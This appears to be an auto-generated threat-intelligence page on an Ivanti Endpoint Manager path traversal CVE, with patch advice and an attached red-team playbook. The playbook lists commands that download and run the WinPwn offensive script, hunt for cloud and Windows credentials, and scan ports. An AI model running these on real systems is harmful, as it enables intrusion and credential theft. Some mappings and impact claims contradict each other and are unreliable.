CVE-2024-10811
Overview
This vulnerability is an absolute path traversal flaw in Ivanti Endpoint Manager affecting file path validation mechanisms. The root cause lies in improper sanitization of user-supplied input used to construct file system paths, allowing traversal outside intended directories. The affected component is the file handling functionality within Ivanti Endpoint Manager versions prior to the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update.
Vulnerability Description
Absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to leak sensitive information.
Impact
An unauthenticated remote attacker can exploit this vulnerability to read sensitive files from the server filesystem, potentially disclosing confidential configuration files, credentials, or other sensitive data. No authentication or user interaction is required, and the attack can be performed over the network. This can lead to significant information disclosure, aiding further attacks or data breaches. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms the ease of exploitation and high impact on confidentiality, integrity, and availability.
Solution
Ivanti has released security updates in the 2024 January-2025 Security Update and the 2022 SU6 January-2025 Security Update to address this vulnerability. Users should upgrade Ivanti Endpoint Manager to these versions or later as specified in the advisory available at https://forums.ivanti.com/s/article/Security-Advisory-EPM-January-2025-for-EPM-2024-and-EPM-2022-SU6. No alternative workarounds are documented; applying the vendor-provided patches is required to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with Ivanti Endpoint Manager is characterized by an absolute path traversal flaw that allows unauthorized remote attackers to access sensitive information. This type of vulnerability occurs when an application improperly validates user-supplied input, specifically file paths. In this case, the affected versions of Ivanti Endpoint Manager fail to adequately sanitize input, enabling attackers to manipulate file paths and gain access to files outside the intended directory structure. This could lead to the exposure of sensitive configuration files, user data, or other critical information stored on the server, thus compromising the confidentiality of the system.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious request that includes specially designed path traversal sequences, such as "../", to navigate the file system hierarchy. This request could be sent to the server hosting Ivanti Endpoint Manager, potentially allowing the attacker to retrieve files that should not be accessible. The absence of authentication requirements means that even unauthenticated users can exploit this vulnerability, significantly increasing the risk of unauthorized access. Scenarios may include attackers targeting the system to extract sensitive data, such as user credentials or configuration files, which could then be used for further attacks or to gain unauthorized access to other systems.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on Ivanti Endpoint Manager for managing their IT infrastructure. The potential for sensitive information leakage poses a significant business risk, as it could lead to data breaches, regulatory penalties, and reputational damage. Organizations may face legal consequences if they fail to protect sensitive data, especially in industries governed by strict data protection regulations. Additionally, the exposure of internal configurations could provide attackers with insights into the organization’s infrastructure, making it easier for them to launch more sophisticated attacks, such as privilege escalation or lateral movement within the network.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular vulnerability assessments and penetration testing can help identify weaknesses in the system before they can be exploited. Additionally, organizations should ensure that they are running the latest versions of Ivanti Endpoint Manager, as updates released in January 2025 address this specific vulnerability. Employing web application firewalls (WAFs) can also provide an additional layer of security by filtering out malicious requests that may attempt to exploit path traversal vulnerabilities. Furthermore, monitoring logs for unusual access patterns or requests can aid in early detection of potential exploitation attempts.
In conclusion, the absolute path traversal vulnerability in Ivanti Endpoint Manager poses a significant threat to organizations that utilize this software for endpoint management. The ability for unauthenticated attackers to leak sensitive information underscores the importance of robust security practices, including timely software updates, proactive monitoring, and comprehensive vulnerability management. Organizations must remain vigilant and adopt a layered security approach to protect against such vulnerabilities and mitigate the associated risks effectively.
CSURFACE threat intelligence has identified a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2024-10811, reflecting a growing likelihood of exploitation attempts targeting the Ivanti Endpoint Manager vulnerability. Although no new exploit techniques or proof-of-concept code have surfaced, the upward trend in EPSS—now nearly doubling—signals heightened attacker interest or improved feasibility of exploitation. This escalation elevates the vulnerability’s risk profile, indicating that threat actors may be prioritizing this vector for information leakage campaigns. For defenders, this shift underscores the necessity of intensified monitoring and readiness, as the probability of successful exploitation in operational environments is increasing even in the absence of publicly disclosed exploits. Consequently, the threat level associated with CVE-2024-10811 should be considered elevated, warranting closer scrutiny within vulnerability management and incident response workflows.
Affected Products (8)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Endpoint Manager | All |
cpe:2.3:a:ivanti:endpoint_manager:*:-:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2022 |
cpe:2.3:a:ivanti:endpoint_manager:2022:-:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2022 |
cpe:2.3:a:ivanti:endpoint_manager:2022:su1:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2022 |
cpe:2.3:a:ivanti:endpoint_manager:2022:su2:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2022 |
cpe:2.3:a:ivanti:endpoint_manager:2022:su3:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2022 |
cpe:2.3:a:ivanti:endpoint_manager:2022:su4:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2022 |
cpe:2.3:a:ivanti:endpoint_manager:2022:su5:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2024 |
cpe:2.3:a:ivanti:endpoint_manager:2024:-:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-10811 |
| forums.ivanti.com |
GitHub CVE
|
https://forums.ivanti.com/s/article/Security-Advisory-EPM-January-2025-for-EPM-2024-and-EPM-2022-SU6 |
| horizon3.ai |
NVD API
Exploit
Third Party Advisory
|
https://www.horizon3.ai/attack-research/attack-blogs/ivanti-endpoint-manager-multiple-credential-coercion-vulnerabilities/ |